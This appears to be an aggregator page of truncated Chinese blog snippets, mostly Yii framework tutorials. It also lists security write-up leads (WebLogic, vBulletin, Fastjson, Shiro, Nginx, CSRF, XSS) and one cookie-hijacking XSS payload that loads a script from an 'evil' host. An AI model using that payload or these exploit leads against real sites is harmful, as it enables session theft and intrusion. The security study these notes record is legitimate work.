一 Yii Framework 2.0.9 - Cross Site ScriptingPublished # Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting # Discovery Date: 2019-02-12 # Exploit Author: Gionathan "John" Reale # Vendor Homepage: https://www.yiiframework.com/ # Version: 2…

一.下载Yii 在部署yii框架之前首先要搭建好php环境,这里就不说搭建环境的问题了(这里已经部署好wampserver了),环境搭建好后,到yii官方网站下载yii framework:http://www.yiiframework.com/ 将下载下来的文件夹解压,放置你的php环境目录里面:这里我们需要的只有两个文件夹framework和requirements:framework是框架文件,这个是必须的:requirements是环境检测文件:demos是示例. 然后检测一下当前的环境…

1.拓展yii 此文针对Yii1.1.15而写,请注意甄别你的Yii Framework 版本. 拓展yii是开发期间常见的代码处理方式.例如,你写一个新的controller(业务控制器),你通过继承CController类来拓展它,当你写了一个新的widget(小部件,具有独立的功能),也会继承CWidget或一个已经存在的widget类.如果拓展的代码被设计为可被第三方开发者使用,我们就称其为一个拓展(extension). 一个拓展通常用于一个单独的意图,在yii框架的词汇表里面,拓展y…

异常无处不在,作为程序员,活着就是为了创造这些异常,然后修复这些异常而存在的.YII框架封装了PHP的异常,让异常处理起来更简单. 使用 YII处理错误和异常的配置方法: 你可以在入口文件中定义YII_ENABLE_ERROR_HANDLER和YII_ENABLE_EXCEPTION_HANDLER为true. 引发异常的情况 1.触发onError或者onException事件 2.人为抛出异常.例如 throw new ExceptionClass('错误信息');//异常的基类 throw…

有关Yii Tab类: http://www.yiichina.com/api/CTabView http://www.yiichina.com/api/CJuiTabs http://blog.csdn.net/dreamzml/article/details/8485446 http://www.yiiframework.com/wiki/569/how-to-create-cjui-tabs-render-partial-ajax-tabs-color-tabs/ Yii Framewor…

1. Yii Framework] 如何获取当前controller的名称? 下面语句就可以获取当前控制器的名称了! Yii::app()->controller->id 2. yii 如何使用第三方插件 第一,比如说,我们要使用 Zend framework的东西.我们把zend framework解压到 prtected/vendors里面,现在的文件夹为 protected/vendors/Zend/Search/Lucene.php 第二,在controller文件的头部,插入下面代码…

到这里,大概的YII开发已经基本可以,但是下面要将的所有课程,学完之后可以让你更爱YII.下面的教程是讲的MVC的M,model.数据,业务,代码的集中地区.所以开始之前,学学开发规范-路径别名-命名空间-,来写出自己爱看,别人能看的代码.开发规范对于一个php开发这来说还是很无奈的.这里不多说了,规则不是我定的,我的目的就是在这里罗列一点,来说说什么是规范.尽管我写的代码只有我自己爱看. YII官方给出了四篇文档来说明: 路径别名.名字空间:http://www.yiiframework.co…

Yii Framework隐藏index.php文件的步骤 作者:feebas 发布于:2012-4-23 13:36 Monday 分类:Yii Framework 1.开启apache的mod_rewrite模块      去掉LoadModule rewrite_module modules/mod_rewrite.so前的“#”符号      确保<Directory "..."></Directory>中有“AllowOverride All”2.在项…

解决方案 yii/framework/yiic.bat,修改 if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exeif "%PHP_COMMAND%" == "" set PHP_COMMAND=D:\wamp\php\php.exe 关掉dos窗口 再打 输入 yiic webapp XX…

Yii的框架和其他框架的区别在于:它是更加 快速,安全,专业的PHP框架 Yii是一个高性能的,适用于开发WEB2.0应用的PHP框架. Yii是一个基于组件.用于开发大型 Web 应用的 高性能 PHP 框架.Yii 几乎拥有了 所有的特性 ,包括 MVC.DAO/ActiveRecord.I18N/L10N.caching.基于 JQuery 的 AJAX 支持.用户认证和基于角色的访问控制.脚手架.输入验证.部件.事件.主题化以及 Web 服务等等.Yii 采用严格的 OOP 编写,Yii…

http://hi.baidu.com/lossless1009/item/990fdb33a52ffcf1e7bb7a4c <?php002 003 // 取消下行的注释,来定义一个路径别名004 // Yii::setPathOfAlias('local','path/to/local-folder');005 006 // 这是 Web 应用配置的主体部分.任何可写的007 // CWebApplication 属性可以在这里配置.008 return array(009 010    …

download and config download yii-1.1.12 unzip into yii-1.1.12 config yii-1.1.12 dir an apache httpdoc dir check yii requirements http://hostname/YiiPath/requirements/index.php ok, your soap extension need to be turned on modify your php.ini and resta…

Ⅰ.基本概念一.入口文件入口文件内容:一般格式如下:<?php $yii=dirname(__FILE__).'/../../framework/yii.php';//Yii框架位置$config=dirname(__FILE__).'/protected/config/main.php';//当前应用程序的主配置文件位置 // 部署正式环境时,去掉下面这行// defined('YII_DEBUG') or define('YII_DEBUG',true);//是否运行在调试模式下 requi…

我也是新手,不过之前学习了tp和ci框架,所以尝鲜想看看yii到底有多强大. 如何新建一个webapp(网站应用)呢,下面是2个步骤: 1. cmd 切换到htdocs下面的yii目录下的framework,如图: 2. 新建webapp,在framework目录下执行: yiic webapp ..\myweb(你的网站名称) 然后输入yes即可. ps: 此时可能会报错, “php.exe”不是内部或外部命令 需要修改该目录下面的yiic.bat文件,用记事本打开,if "%PHP_COMM…

昨天群里HW的大佬们都在传某某服终端检测响应平台edr存在大量RCE的洞 官网上关于EDR的介绍是这么写的 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防.防御.检测.响应赋予终端更为细致的隔离策略.更为精准的查杀能力.更为持续的检测能力.更为快速的处置能力.在应对高级威胁的同时,通过云网端联动协同.威胁情报共享.多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级.智能化.响应快的下一代终端安全系统 存在这种级别的漏洞,确实危害极大 根据已知消息存在PHP变量覆盖漏洞 部分代码…

此方法参考官方网站的cookbook,详细请看http://www.yiiframework.com/doc/cookbook/33/, 我在此基础上做了一些改动,人个感觉非常棒了,大家可以试一下! 首先我把目录结构写下来: wwwroot/ index.php admin.php assets/ images/ protected/ config/ main.php components/ controllers/ models/ views/ runtime/ admin/ config/…

MSDN: http://msdn.microsoft.com/en-us/data/aa937723 台湾博客: http://www.dotblogs.com.tw/yc421206/ http://www.dotblogs.com.tw/terrychuang/archive/2013/03/25/98832.aspx Entity Framework 5.0系列 http://www.cnblogs.com/kenshincui/category/511593.html Entity F…

base 底层的类库文件 caching 所有缓存方法 cli 项目生成脚本 collecions 用PHP语言构造传统OO语言的数据存储单元.如队列,栈,哈希等等 console yii控制台 db数据库操作类 gii代码生成器(脚手架,可以生成模型.控制器.视图等代码) i18n 多语言 logging 日志组件 test Yii提供的测试,包括单元测试和功能测试 utils 提供了常用的格式化方法 validators 提供了各种验证方法 vendors 这个文件夹包括第三方由YII框架使…

目录 五. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210) 1. 利用过程 2. 修复建议 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.html 二.weblogic弱口令 http://www.cnblogs.com/0x4D75/p/8918761.html 三.weblogic 后台提权 http://www.cnblogs.com/0x4D75/p/8919760.html…

目录 四. weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) 0. 漏洞分析 1. 利用过程 2. 修复建议 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.html 二.weblogic弱口令 http://www.cnblogs.com/0x4D75/p/8918761.html 三.weblogic 后台提权 http://www.cnblogs.com/0x4D75/p/8919760.html…

转载▼ 标签: it 分类: 技术共享 官方扩展链接:http://www.yiiframework.com/extension/mailer/这个扩展配置十分方便,如果有问题的话,可以打开Debug: <?php $message = 'Hello World!'; $mailer = Yii::createComponent('application.extensions.mailer.EMailer'); $mailer->Host = <your smtp host>; $…

When developing distributed applications with Yii, naturally, we will face that we have to share the session in different machine. So here we will use memcache to do it. here is the example to store the session with memcache in Yii, in the main.php f…

MSDN: http://msdn.microsoft.com/en-us/data/aa937723 台湾博客: http://www.dotblogs.com.tw/yc421206/ http://www.dotblogs.com.tw/terrychuang/archive/2013/03/25/98832.aspx Entity Framework 5.0系列 http://www.cnblogs.com/kenshincui/category/511593.html Entity F…

这两天整理和编写了csrf的靶场,顺便也复习了以前学习csrf的点,这里记录下学习的总结点. 0x01 关于CSRF 跨站请求伪造 CSRF(Cross-site request forgery)跨站请求伪造:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求.利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的. 一个典型的CSRF攻击有着如下的流程: *受害者登录a.com,并保留了登录凭证(Cookie). *攻击…

CMS识别 云悉 http://whatweb.bugscaner.com/batch.html CakePHP  CakePHP <= / Cache Corruption Exploit 2011-01 vBulletin CVE-- vBulletin .x 0day pre-auth RCE #POC #!/usr/bin/python # # vBulletin .x 0day pre-auth RCE exploit # # This should work on all versi…

Fastjson 反序列化 CVE-- Fastjson 利用版本范围为 Fastjson 及之前的版本 Struts2 S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-,S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-, S2-devMode, S2- Apache Shiro 反序列化 影响版本 Apache Shiro <= 1.2.4 Cookie字段里是否包含rememberME参…

短信轰炸 .Fiddler抓包repeat .burpsuite 修改 PHPSESSID ->字典爆破 如选择a-z .burpsuite手机号遍历 防御: 设置图片验证码,每次获取短信验证码之间,先判定图片验证码的正确性. 设置时间限制,前端按钮设置点击事件时间限制. 设置服务器短信下发的时间间隔. 设置每个手机号时间段内获取短信的次数  Cookie劫持 http://www.a.com/test.php?abc="><script src =http://evil.co…

简单介绍NGINX: Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行. 其特点是占有内存少,并发能力强,nginx的并发能力在同类型的网页服务器中表现较好.主要应用在百度,淘宝等高并发请求情形. 漏洞: 1.NGINX解析漏洞 (1)Nginx文件名逻辑漏洞(CVE-2013-4547) 影响版本:Nginx 0.8.41~1.4.3 / 1.5.0~1.5.7 漏洞原理:主要原因是nginx错误的解析了请求的UR…

XSS在线测试环境: http://xss-quiz.int21h.jp/ https://brutelogic.com.br/xss.php 这两个站对xss的理解很有帮助!!! 参考链接: https://www.anquanke.com/post/id/86585 https://www.jianshu.com/p/99cf89bb65c3 开始学习------><------- XSS简介: XSS,跨站脚本攻击,Cross-Site-Scripting,由于简写与css(层叠样式脚本…

日志的作用(此处省略1000字) YII中的日志很好很强大,允许你把日志信息存放到数据库,发送到制定email,存放咋文件中,意见显示页面是,甚至可以用来做性能分析. YII中日志的基本配置:/yii_dev/testwebap/protected/config/main.php 'log'=>array( 'class'=>'CLogRouter', 'routes'=>array( array( 'class'=>'CFileLogRoute', 'levels'=>'e…